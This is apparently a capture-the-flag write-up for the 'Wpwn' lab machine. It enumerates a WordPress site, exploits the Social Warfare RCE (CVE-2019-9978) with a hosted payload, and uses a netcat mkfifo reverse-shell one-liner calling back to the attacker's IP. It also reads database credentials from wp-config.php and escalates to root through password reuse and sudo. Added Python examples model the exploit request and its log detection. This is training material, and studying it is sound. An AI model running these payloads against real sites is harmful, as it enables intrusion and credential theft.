# Wpwn

## Nmap

```
sudo nmap 192.168.178.123 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Running `curl` against port 80 returns only a short greeting from the box's creator.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6d409c4ea29c5db88db363f126a052138588e817%2Fimage.png?alt=media)

With nothing else interesting we move onto directory enumeration with `dirsearch.py`.

```
sudo python3 dirsearch.py -u http://192.168.178.123/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --full-url -t 75
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d9b2de0b383f89d6b18675734c1fac8bad5611f3%2Fimage.png?alt=media)

With the common.txt wordlist we hit `robots.txt` and `/wordpress`. `robots.txt` contains nothing of interest.

Moving over to the /wordpress directory we get the following page.

![/wordpress](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1f41338cf623f9327592353bd0cc8d6d92c5a895%2Fimage.png?alt=media)

Other than this the WordPress site contains no interesting information. From here we can run `WPScan` to enumerate the install (plugins, users and versions) further.

```
wpscan --url http://192.168.178.123/wordpress/ --passwords /usr/share/wordlists/rockyou.txt   
```

`WPScan` identifies the plugin `social-warfare` as installed and out of date (version 3.5.2).

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2c301cc3e90b23bae472b739388e40f35867b2aa%2Fimage.png?alt=media)

Checking this version against `searchsploit` reveals an RCE against the running version.

```
searchsploit -w social warfare 3.5.2
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6e6b5e337d08e7243b7d2fa0e9e1b7c20d5c2110%2Fimage.png?alt=media)

The vulnerability has been assigned CVE-2019-9978.

Description (from the CVE entry):

The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the `wp-admin/admin-post.php?swp_debug=load_options` `swp_url` parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.

The CVE text only mentions stored XSS, but the same unauthenticated `load_options` debug path fetches the URL given in `swp_url` and passes the text between `<pre>` tags in the response to `eval()`, which is what gives remote code execution.

The following GitHub shows a PoC for this exploit.

{% embed url="<https://github.com/hash3liZer/CVE-2019-9978>" %}

As per the GitHub README, we host a text file on the attacking machine whose `<pre>` block contains the PHP we want the target to run:

```
<pre>system('command')</pre>
```

First I hosted a `Python SimpleHTTPServer` on my attacking machine.

```
sudo python2 -m SimpleHTTPServer 443
```

I then downloaded the associated Python script and ran it as below.

```
python2 cve-2019-9978.py  --target http://192.168.178.123/wordpress/ --payload-uri http://192.168.49.178:443/test.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e82b2bb42b9f3dc88cc1dd7a7b0e0de2593c4df3%2Fimage.png?alt=media)

In the example above the command in test.txt was `'id'`. I then replaced it with `'which nc'` to check whether `netcat` is on the target and ran the exploit again.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8fd628de7038b0c4e9ab9861d1b1c453d2978577%2Fimage.png?alt=media)
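To make the request flow above concrete, here is an added example (not the plugin's code and not the hash3liZer PoC) that builds the `admin-post.php` URL the PoC sends, serves a `<pre>` payload file from a loopback port in place of the SimpleHTTPServer, models what the unpatched `load_options` path does with `swp_url` (fetch it and cut out the `<pre>` body, which the real code handed to `eval()`; here it is only returned), and finally flags such requests in Apache-style access log lines. The target host, ports and log lines are constructed for the example; nothing is sent to the target.

```python
"""Model of the CVE-2019-9978 request path plus an access-log check.

Added example, not the plugin's code or the PoC script. The vulnerable
behaviour is modelled, not executed: the <pre> body is returned, never eval'd.
"""
import os
import re
import tempfile
import threading
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urljoin, urlparse
from urllib.request import urlopen

PRE_RE = re.compile(r"<pre>(.*?)</pre>", re.S)
# Apache combined log: the request line is the quoted "METHOD /path?query HTTP/x.y"
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def build_exploit_url(target: str, payload_uri: str) -> str:
    """The debug endpoint the PoC hits: admin-post.php?swp_debug=load_options&swp_url=<ours>."""
    base = target if target.endswith("/") else target + "/"
    query = urlencode({"swp_debug": "load_options", "swp_url": payload_uri})
    return urljoin(base, "wp-admin/admin-post.php") + "?" + query


def extract_pre_payload(body: str) -> Optional[str]:
    """What the vulnerable handler evaluates: the text between the first <pre> tags."""
    m = PRE_RE.search(body)
    return m.group(1) if m else None


def serve_payload(php: str) -> Tuple[ThreadingHTTPServer, str]:
    """Write <pre>php</pre> to test.txt in a temp dir and serve it on 127.0.0.1:<random port>."""
    directory = tempfile.mkdtemp()
    with open(os.path.join(directory, "test.txt"), "w") as fh:
        fh.write(f"<pre>{php}</pre>\n")
    handler = partial(SimpleHTTPRequestHandler, directory=directory)
    server = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}/test.txt"


def vulnerable_load_options(exploit_url: str) -> Optional[str]:
    """Model of the unpatched plugin's load_options debug path.

    No authentication or nonce is checked (that is the bug): the server fetches
    whatever swp_url points at and extracts the <pre> body. The real code then
    passed that string to eval(); this model returns it instead. Only the query
    string of exploit_url is used, so the target host is never contacted.
    """
    qs = parse_qs(urlparse(exploit_url).query)
    if qs.get("swp_debug") != ["load_options"] or not qs.get("swp_url"):
        return None
    with urlopen(qs["swp_url"][0], timeout=5) as resp:
        return extract_pre_payload(resp.read().decode("utf-8", "replace"))


def find_swp_hits(log_lines: List[str]) -> List[str]:
    """Return the (decoded) swp_url of every request matching the exploit pattern."""
    hits = []
    for line in log_lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        qs = parse_qs(urlparse(m.group(1)).query)
        if "load_options" in qs.get("swp_debug", []) and qs.get("swp_url"):
            hits.append(qs["swp_url"][0])
    return hits


# Constructed access-log lines for the detection check (not captured from the box).
SAMPLE_LOG = [
    '192.168.49.178 - - [01/Jan/2021:10:00:00 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "curl/7.74.0"',
    '192.168.49.178 - - [01/Jan/2021:10:00:05 +0000] "GET /wordpress/wp-admin/admin-post.php'
    '?swp_debug=load_options&swp_url=http%3A%2F%2F192.168.49.178%3A443%2Ftest.txt HTTP/1.1" 200 0 "-" "python-requests/2.25.1"',
]

if __name__ == "__main__":
    server, uri = serve_payload("system('id')")
    try:
        url = build_exploit_url("http://192.168.178.123/wordpress/", uri)
        print(url)
        print("body handed to eval():", vulnerable_load_options(url))
        print("log hits:", find_swp_hits(SAMPLE_LOG))
    finally:
        server.shutdown()
```

On the defensive side, the `find_swp_hits` pattern is the thing to grep for in web logs: a `swp_debug=load_options` request carrying an external `swp_url` has no legitimate reason to appear from an unauthenticated client.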

As `netcat` is installed we can replace the command in the test.txt file with that of a `netcat` reverse shell.

Contents of test.txt:

```
<pre>system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.178 80 >/tmp/f')</pre>
```

I then set a `netcat` listener on my attacking machine:

```
sudo nc -lvp 80
```

Running the exploit again makes the script hang, because the target's PHP process stays blocked serving our reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-33cb53f3c4dd570d0e8ec8f01c99da5485f45a2a%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4a182807b8577edf9c8b3c38fecd22821b564032%2Fimage.png?alt=media)

We then upgrade the shell:

```
/usr/bin/script -qc /bin/bash /dev/null
```

Moving up one directory from where the shell lands, we can read `wp-config.php` for the MySQL database credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aaba7fa2c5c4733d8b3eb34686314637dee704d6%2Fimage.png?alt=media)
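Pulling the `define()` values out of `wp-config.php` by eye works on a CTF box, but the password here is full of shell metacharacters (`&`, `]`, `,`, `:`), which is exactly where copy-pasting into `mysql -p` goes wrong. The following added example (not from the original write-up) parses the `DB_*` defines, handling single or double quotes, whitespace inside `define()`, escaped quotes and commented-out lines, then builds a safely quoted `mysql` command. The config fragment is constructed; the user and password match what the box exposed, while `DB_NAME` and `DB_HOST` are assumed values.

```python
"""Extract DB_* credentials from wp-config.php and quote them for the shell.

Added example, not part of the original write-up. SAMPLE_WP_CONFIG is
constructed: DB_USER/DB_PASSWORD are the values found on the box,
DB_NAME and DB_HOST are assumptions.
"""
import re
import shlex
from typing import Dict

# Matches   define( 'DB_USER', 'wp_user' );   and   define("DB_PASSWORD", "p\"w");
# Group 1: constant name; group 2: single-quoted value; group 3: double-quoted value.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](DB_\w+)['"]\s*,\s*"""
    r"""(?:'((?:\\.|[^'\\])*)'|"((?:\\.|[^"\\])*)")\s*\)"""
)


def _unescape(value: str) -> str:
    """Undo the escapes that matter for credentials: \\' \\" and \\\\ (other PHP
    double-quote escapes such as \\n are left alone)."""
    return re.sub(r"\\(['\"\\])", r"\1", value)


def parse_wp_config(text: str) -> Dict[str, str]:
    """Return the DB_* defines, ignoring commented-out lines."""
    creds: Dict[str, str] = {}
    for line in text.splitlines():
        stripped = line.lstrip()
        if stripped.startswith(("//", "#", "*", "/*")):
            continue
        m = DEFINE_RE.search(line)
        if m:
            raw = m.group(2) if m.group(2) is not None else m.group(3)
            creds[m.group(1)] = _unescape(raw)
    return creds


def mysql_command(creds: Dict[str, str]) -> str:
    """Build a shell-safe mysql invocation; the password must be glued to -p."""
    host = creds.get("DB_HOST", "localhost")
    parts = ["mysql", "-h", host, "-u", creds["DB_USER"],
             "-p" + creds["DB_PASSWORD"], creds["DB_NAME"]]
    return " ".join(shlex.quote(p) for p in parts)


# Constructed wp-config.php fragment (not a copy of the real file on the box).
SAMPLE_WP_CONFIG = """<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
// define( 'DB_USER', 'old_user' );   // stale, commented out
define( 'DB_USER', 'wp_user' );
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );
define("DB_HOST", "localhost");
define( 'DB_CHARSET', 'utf8' );
"""

if __name__ == "__main__":
    found = parse_wp_config(SAMPLE_WP_CONFIG)
    print(found)
    print(mysql_command(found))
```

The password still ends up in the process list when passed with `-p` on the command line; running `mysql -u wp_user -p wordpress` and typing it at the prompt avoids that, and the quoted string above is what you paste there.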

This gives us the database credentials `wp_user:R3&]vzhHmMn9,:-5`. From here I logged into `MySQL` and took the WordPress administrator's password hash, but was unable to crack it. The box also has a local user `takis`, so I checked for password reuse by trying the database password over `SSH` as takis.

```
ssh takis@192.168.178.123
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f91ac480f037e15413d1172dd305ce859f2a3167%2Fimage.png?alt=media)

Now that we are in as takis, I ran `sudo -l` to check sudo permissions.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e17cb5bb478b86d9c773b6630f6b7dcba91b3c4c%2Fimage.png?alt=media)

It looks like we can run any command as any user without a password, so a simple `sudo /bin/bash` spawns a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-059d5ad64121ad0feadaf62e480829722054fe71%2Fimage.png?alt=media)
